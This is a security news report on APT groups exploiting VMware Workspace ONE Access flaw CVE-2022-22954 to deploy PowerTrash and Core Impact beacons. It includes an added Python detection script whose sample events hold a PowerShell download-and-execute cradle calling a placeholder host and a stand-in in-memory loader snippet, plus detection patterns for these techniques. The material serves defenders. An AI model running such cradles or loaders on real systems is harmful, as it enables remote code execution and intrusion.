Researchers said that advanced persistent threat (APT) groups started to actively exploit a VMware remote code execution flaw in mid-April, a week after a patch was released for the vulnerability.
The vulnerability (CVE-2022-22954) exists in VMware’s identity management service, Workspace ONE Access (previously known as VMware Identity Manager). It is a server-side template injection bug in a component running under Apache Tomcat: a malicious actor with network access to the service can inject a template that the server evaluates, which results in arbitrary commands being executed on the hosting server and gives the attacker full remote code execution.
A patch was released for the initial flaw on April 6, and on April 11, a proof-of-concept appeared for the attack. On April 13, the first exploit attempts were observed in the wild.
“Adversaries can use this attack to deploy ransomware or coin miners, as part of their initial access, lateral movement, or privilege escalation,” said researchers in a Monday analysis. “Morphisec research observed attackers already exploiting this vulnerability to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons.”
In one specific campaign, on April 14 and April 15, researchers with Morphisec observed attackers leveraging the flaw to execute PowerShell commands as child processes of the legitimate Tomcat service wrapper, prunsrv.exe. In the next stage, the researchers observed a known malware loader called PowerTrash, a highly obfuscated PowerShell script that decompresses its payload and loads it in memory. PowerTrash has previously been used to deploy JSSLoader, a .NET RAT typically associated with FIN7 campaigns, but in this incident the attackers attempted to load a Core Impact agent, the researchers said.
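The process chain Morphisec describes (PowerShell running as a child of the Tomcat service wrapper, followed by an obfuscated script that decodes and decompresses a payload in memory) is what a detection engineer would hunt for in process-creation telemetry. The Python below is an added example, not code from the original article, Morphisec or VMware: it runs a heuristic over constructed Sysmon-style process-creation records, decodes -EncodedCommand arguments, and flags both the parent/child relationship and common in-memory loader tells. The indicator patterns, file paths and sample events are constructed assumptions for illustration, not a PowerTrash signature.

```python
"""Flag PowerShell spawned by the Tomcat service wrapper plus in-memory loader tells.

Added example for the process chain described above; not code from Morphisec,
VMware or the PowerTrash loader. Events are constructed Sysmon event ID 1
(process creation) style records using Sysmon's ParentImage, Image and
CommandLine field names. The indicator patterns are a hypothetical heuristic
for "decode, decompress, load in memory" scripts, not a vendor signature.
"""
import base64
import re
from typing import Optional

# prunsrv.exe is the Apache Commons Daemon service wrapper that hosts Tomcat on
# Windows; deployments sometimes rename it, so extend this set for your estate.
TOMCAT_WRAPPERS = {"prunsrv.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Hypothetical indicator set, constructed for this example.
LOADER_INDICATORS = {
    "base64 decode": r"FromBase64String",
    "in-memory decompression": r"IO\.Compression\.(?:Gzip|Deflate)Stream",
    "reflective assembly load": r"Reflection\.Assembly\]::Load",
    "dynamic evaluation": r"Invoke-Expression|\biex\b",
}

# powershell.exe accepts -EncodedCommand and unambiguous prefixes (-e, -ec, -enc ...);
# the argument is the script encoded as UTF-16LE and then base64.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script when the command line uses -EncodedCommand, else None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> dict:
    """Score one process-creation event; returns severity, reasons and matched indicators."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    reasons = []

    chain = parent in TOMCAT_WRAPPERS and image in POWERSHELL
    if chain:
        reasons.append(f"{image} spawned by Tomcat service wrapper {parent}")

    script = decode_encoded_command(cmdline)
    if script is not None:
        reasons.append("encoded PowerShell command line")

    # Scan the raw command line and, when present, the decoded script.
    text = cmdline if script is None else cmdline + "\n" + script
    indicators = [name for name, pat in LOADER_INDICATORS.items() if re.search(pat, text, re.I)]
    if indicators:
        reasons.append("in-memory loader indicators: " + ", ".join(indicators))

    if chain:
        severity = "high"    # a web service spawning PowerShell is the key tell
    elif indicators:
        severity = "medium"
    elif script is not None:
        severity = "low"     # encoded alone is common in admin tooling
    else:
        severity = "none"
    return {"severity": severity, "reasons": reasons, "indicators": indicators}


def scan(events) -> list:
    """Return (severity, event, reasons) for every event scored above 'none'."""
    results = [(analyze(ev), ev) for ev in events]
    return [(r["severity"], ev, r["reasons"]) for r, ev in results if r["severity"] != "none"]


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample data; the "loader" script is a stand-in for the
# decode/decompress/load pattern, not the real PowerTrash code.
LOADER_SCRIPT = (
    "$d=New-Object IO.MemoryStream(,[Convert]::FromBase64String($p));"
    "$g=New-Object IO.Compression.GzipStream($d,[IO.Compression.CompressionMode]::Decompress);"
    "[Reflection.Assembly]::Load($buf).EntryPoint.Invoke($null,$null)"
)
SAMPLE_EVENTS = [
    {   # Tomcat wrapper spawning encoded PowerShell: the chain the article describes
        "ParentImage": r"C:\VMware\Tomcat\bin\prunsrv.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(LOADER_SCRIPT),
    },
    {   # Plain-text download cradle from cmd.exe: suspicious, but not the Tomcat chain
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": "pwsh.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\"",
    },
    {   # Benign interactive use
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Get-ChildItem C:\\Logs",
    },
]

if __name__ == "__main__":
    for severity, ev, reasons in scan(SAMPLE_EVENTS):
        print(severity.upper(), basename(ev["Image"]), "<-", basename(ev["ParentImage"]))
        for reason in reasons:
            print("   ", reason)
```

Run directly, the script prints the two flagged events and the reasons for each. The parent/child rule is the high-confidence signal on its own, since a Tomcat-hosted web service rarely has a legitimate reason to launch PowerShell; the indicator scan only adds context for triage and would need tuning against an environment's own administrative scripts.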
“Core Impact is a penetration testing framework developed by Core Security,” said researchers. “As with other penetration testing frameworks, these aren’t always used with good intentions. Trend Micro reported a modified version of Core Impact was used in the Woolen-GoldFish campaign tied to the Rocket Kitten APT35 group.”
Researchers urged organizations to apply VMware’s patches, and review their VMware architecture to ensure that impacted components are not accidentally published on the internet, which “dramatically increases the exploitation risks.”
“The widespread use of VMware identity access management combined with the unfettered remote access this attack provides is a recipe for devastating breaches across industries,” said researchers. “Anyone using VMware’s identity access management should immediately apply the patches VMware has released.”
VMware products have been targeted before: attackers have exploited a remote code execution bug in VMware’s vCenter Server, gone after VMware’s ESXi enterprise hypervisor, and exploited the Log4j flaw on VMware Horizon servers.